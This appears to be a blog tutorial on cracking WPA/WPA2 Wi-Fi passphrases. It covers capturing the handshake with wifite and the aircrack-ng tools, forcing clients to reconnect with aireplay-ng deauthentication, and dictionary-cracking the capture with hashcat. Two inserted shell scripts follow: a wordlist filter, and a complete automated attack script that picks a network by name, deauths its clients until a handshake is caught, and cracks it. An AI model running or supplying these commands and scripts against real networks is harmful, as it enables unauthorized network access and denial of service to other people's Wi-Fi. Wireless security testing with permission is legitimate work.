Cracking Wifi Passwords (WPA/WPA2)

Submitted by jabrown on Mon, 12/18/2017 - 04:34

The process for cracking WPA/WPA2 pre-shared keys is simple.

First, capture the four-way handshake between the access point and a client on the target network.

Second, run an offline dictionary attack against the captured handshake with a password cracker like John the Ripper, Hashcat, or aircrack-ng.


There are several ways to capture the WPA handshake. We'll go over two, wifite and airodump-ng, and use Hashcat to crack the WPA password in both cases.

Wifite:

To start wifite we just use this command: wifite -i {wireless interface}

[Screenshot: wifite starting]

It should then list the wireless access points it sees, with information about each, such as whether it uses WPA and whether it has WPS enabled.

[Screenshot: wifite access point list]

We stop wifite's scan with Ctrl-C and give it the numbers of the access points we want to target.

[Screenshot: wifite target selection]

Wifite will wait for a WPA handshake. If it doesn't see one, it sends deauthentication packets, which should make the clients connected to the access point reconnect and generate a fresh four-way WPA handshake.

[Screenshot: wifite handshake capture]

Once we have a captured handshake, we need to convert it to a Hashcat compatible format. The cap2hccapx tool in the hashcat-utils git repository converts the pcap to a hccapx file: cap2hccapx.bin {wpa pcap file} {wpa hccapx file}. (Newer Hashcat releases, 6.x and later, deprecate the hccapx format and -m 2500 in favor of hcxpcapngtool output and -m 22000; the rest of the workflow is the same.)

[Screenshot: cap2hccapx conversion]

We can now use Hashcat to crack the WPA password with this command: hashcat -a 0 -m 2500 {hccapx file} {wordlist} (-a 0 is a straight dictionary attack, -m 2500 is the WPA/WPA2 hash mode).

[Screenshot: hashcat command]

Hashcat cracked the password. Cracking WPA passwords with Hashcat takes a while: each candidate has to go through PBKDF2-HMAC-SHA1 with 4096 iterations before it can be checked against the handshake, so the run time scales directly with the size of the wordlist. It pays to use a wordlist built for WPA: a valid passphrase is 8 to 63 printable ASCII characters, so shorter or longer entries in a general-purpose list are wasted work.

[Screenshot: hashcat cracked password]
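As an added example (not part of the original post), here is a small shell script that trims a generic wordlist down to candidates that can actually be a WPA/WPA2 passphrase before handing it to hashcat. The sample words in sample_wordlist are constructed for the demo; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original post: trims a generic wordlist to
# candidates that can actually be a WPA/WPA2 passphrase. The PSK is derived
# with PBKDF2-HMAC-SHA1 (4096 iterations, the SSID as salt) from a passphrase
# of 8 to 63 printable ASCII characters, so anything outside that range can
# never be the key and only burns cracking time. Sample words are constructed.

# Constructed input: too short, valid, valid with spaces, duplicate,
# non-ASCII, 64 characters (one too many), valid.
sample_wordlist() {                # sample_wordlist <path>
    printf '%s\n' 'short' 'password1' 'Correct Horse Battery' 'password1' \
        'ñoñopassword' "$(printf '%064d' 0)" 'Tr0ub4dor&3' > "$1"
}

# Keep lines of 8-63 printable ASCII characters, drop duplicates, write the
# survivors to <out> and report the counts on stdout.
wpa_filter() {                     # wpa_filter <in> <out>
    awk '
        { sub(/\r$/, "") }                               # tolerate CRLF lists
        length($0) >= 8 && length($0) <= 63 && $0 ~ /^[ -~]+$/ && !seen[$0]++ {
            print > out; kept++; next
        }
        { dropped++ }
        END { printf "kept=%d dropped=%d\n", kept + 0, dropped + 0 }
    ' out="$2" "$1"
}

# Usage: sample_wordlist words.txt; wpa_filter words.txt words.wpa
# then:  hashcat -a 0 -m 2500 capture.hccapx words.wpa
```

The in-memory dedupe (seen[$0]) is fine for lists of a few million lines; for very large lists drop that term and pipe the output through sort -u instead. Run hashcat -b -m 2500 first to get your hardware's hashes per second, then divide the filtered line count by it for a realistic time estimate.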


Airodump:

When capturing the WPA handshake with Airodump-ng we need a few more tools from the aircrack-ng suite: Airmon-ng to put the interface into monitor mode, Airodump-ng to find access points and capture the handshake, and Aireplay-ng to send deauthentication packets that force devices to reconnect to the target access point.

To put the wireless interface into monitor mode, we use this command: airmon-ng start {interface}. This creates a new monitor-mode interface with a name similar to "wlan1mon". If airmon-ng lists processes that could interfere (NetworkManager, wpa_supplicant and the like), run airmon-ng check kill first to stop them.

[Screenshot: airmon-ng]

We will use the monitor interface with Airodump to find our target access point with this command airodump-ng {monitor interface}.

[Screenshot: airodump-ng access point list]

After identifying the BSSID and channel of the target access point we start the capture. If a connected client is shown, note its MAC address as well. With that information we can run: airodump-ng --bssid {bssid} -c {channel} -w {output prefix} {monitor interface}. Airodump-ng writes the capture to {output prefix}-01.cap (plus a CSV with the same prefix) and shows "WPA handshake: {bssid}" in the top right of its display once it has one.

[Screenshot: airodump-ng capture]

It may be necessary to make connected devices reconnect to the access point. We use Aireplay-ng for this by sending deauthentication packets to the client: aireplay-ng -0 {packet count} -a {bssid} -c {client MAC} {monitor interface}. A small count (5 to 10) is usually enough; leaving out -c broadcasts the deauth to every client, and -0 0 sends continuously until interrupted. Clients and access points that negotiate 802.11w protected management frames discard forged deauthentication frames, so against those you have to wait for a client to connect on its own.

[Screenshot: aireplay-ng]

Once we have captured the WPA handshake, we use cap2hccapx to convert it to the Hashcat format, exactly as in the wifite section.

[Screenshot: cap2hccapx conversion]

We then use the same hashcat command as before to crack the password.

[Screenshot: hashcat command]
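As an added example (not part of the original post, and not wifite's or aircrack-ng's own code), here is the airodump-ng / aireplay-ng / cap2hccapx / hashcat sequence from this section as one script; it does by hand what the wifite section above does interactively. It assumes the aircrack-ng tools, iw, hashcat and hashcat-utils are installed and that it runs as root; the CSV parsing it relies on is airodump-ng's usual "<prefix>-01.csv" layout, and every MAC address and ESSID in sample_csv is constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the original post: the airodump-ng /
# aireplay-ng / cap2hccapx / hashcat steps above as one script.
# Assumptions: aircrack-ng (airmon-ng, airodump-ng, aireplay-ng), iw,
# hashcat and hashcat-utils (cap2hccapx.bin) are on PATH, the script runs as
# root, and airodump-ng writes its usual "<prefix>-01.cap" / "<prefix>-01.csv"
# files. Every MAC address and ESSID in sample_csv is constructed for the demo.

# Constructed airodump-ng CSV in the column layout airodump-ng writes, so the
# parsing below can be exercised (and tested) without a wireless card.
sample_csv() {                     # sample_csv <path>
    cat > "$1" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:FF, 2017-12-18 04:00:00, 2017-12-18 04:05:00,  6,  54, WPA2, CCMP, PSK, -45,  120,  0,  0.  0.  0.  0,   7, TestNet,
00:11:22:33:44:55, 2017-12-18 04:00:00, 2017-12-18 04:05:00, 11,  54, WPA2, CCMP, PSK, -70,   80,  0,  0.  0.  0.  0,   8, Neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2017-12-18 04:01:00, 2017-12-18 04:05:00, -50,  35, AA:BB:CC:DD:EE:FF, TestNet
DE:AD:BE:EF:00:01, 2017-12-18 04:02:00, 2017-12-18 04:05:00, -60,   3, (not associated), Neighbor
EOF
}

# Find an access point by ESSID in the CSV; prints "BSSID channel".
ap_lookup() {                      # ap_lookup <essid> <csv>
    awk -F', *' -v essid="$1" '
        /^Station MAC/ { exit }                    # client section: stop looking
        length($1) == 17 && $1 ~ /^[0-9A-Fa-f][0-9A-Fa-f]:/ && $14 == essid {
            print $1, $4; exit                     # BSSID is column 1, channel column 4
        }' "$2"
}

# Find a client associated with the BSSID; prints its MAC, or nothing.
client_lookup() {                  # client_lookup <bssid> <csv>
    awk -F', *' -v bssid="$1" '
        /^Station MAC/ { clients = 1; next }
        clients && $6 == bssid { print $1; exit }' "$2"
}

stop_bg() { kill "$1" 2>/dev/null; wait "$1" 2>/dev/null || true; }

# Live procedure: survey, targeted capture with deauth, convert, crack.
crack_wpa() {                      # crack_wpa <iface> <essid> <wordlist>
    iface=$1; essid=$2; wordlist=$3; survey=wpa_survey; capture=wpa_handshake

    # 1. Monitor mode. The new interface name is read back with iw rather than
    #    scraped from airmon-ng's banner.
    airmon-ng check kill >/dev/null
    airmon-ng start "$iface" >/dev/null
    mon=$(iw dev | awk '$1 == "Interface" && $2 ~ /mon$/ { print $2; exit }')
    [ -n "$mon" ] || { echo "no monitor interface found" >&2; return 1; }

    # 2. Short channel-hopping survey to learn BSSID, channel and a client.
    airodump-ng -w "$survey" "$mon" >/dev/null 2>&1 &
    pid=$!; sleep 30; stop_bg "$pid"
    ap=$(ap_lookup "$essid" "${survey}-01.csv")
    [ -n "$ap" ] || { echo "ESSID '$essid' not seen" >&2; return 1; }
    bssid=${ap%% *}; channel=${ap##* }
    client=$(client_lookup "$bssid" "${survey}-01.csv")

    # 3. Capture on the target channel. Deauth the client (broadcast if none
    #    was seen) and retry until cap2hccapx writes a handshake record.
    airodump-ng --bssid "$bssid" -c "$channel" -w "$capture" "$mon" >/dev/null 2>&1 &
    pid=$!
    for try in 1 2 3 4 5; do
        sleep 10
        if [ -n "$client" ]; then
            aireplay-ng -0 5 -a "$bssid" -c "$client" "$mon" >/dev/null
        else
            aireplay-ng -0 5 -a "$bssid" "$mon" >/dev/null
        fi
        sleep 10
        cap2hccapx.bin "${capture}-01.cap" "${capture}.hccapx" >/dev/null
        [ -s "${capture}.hccapx" ] && break      # empty file = no handshake yet
    done
    stop_bg "$pid"
    airmon-ng stop "$mon" >/dev/null
    [ -s "${capture}.hccapx" ] || { echo "no handshake captured" >&2; return 1; }

    # 4. Dictionary attack as in the post. On hashcat 6.2+ use
    #    hcxpcapngtool -o hash.22000 <cap> and -m 22000 instead of hccapx/2500.
    hashcat -a 0 -m 2500 "${capture}.hccapx" "$wordlist"
    hashcat -m 2500 "${capture}.hccapx" --show
}

# Run the live procedure only when called with arguments; with none, the file
# just defines the functions above.
if [ "$#" -eq 3 ]; then crack_wpa "$@"; fi
```

Run it as ./wpa_capture.sh wlan1 TargetNet wordlist.txt on a network you are authorized to test. The survey and deauth timings are starting points; a quiet network with one client may need a longer survey window, and the handshake check (a non-empty hccapx file) is what decides when to stop deauthing.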


Visit the store or contact us if you need to recover some passwords.




https://github.com/derv82/wifite

https://aircrack-ng.org/

https://hashcat.net/hashcat/

https://github.com/hashcat/hashcat-utils